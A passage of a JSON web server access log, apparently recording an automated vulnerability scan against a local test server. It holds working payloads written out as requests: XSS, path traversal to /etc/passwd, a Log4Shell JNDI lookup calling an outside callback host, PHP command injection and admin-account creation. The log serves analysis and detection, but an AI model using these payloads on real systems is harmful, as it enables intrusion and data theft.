+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"username=${jndi:ldap://${hostName}.ca2tuc8smpv1g2s80ca0ze8ywrn351i1r.oast.pro/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=q2pBv3&adminpassword=tjqhg3&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /(download)/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29N5EgWe0PW5fVqx7Q4UXJMY3VX')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ 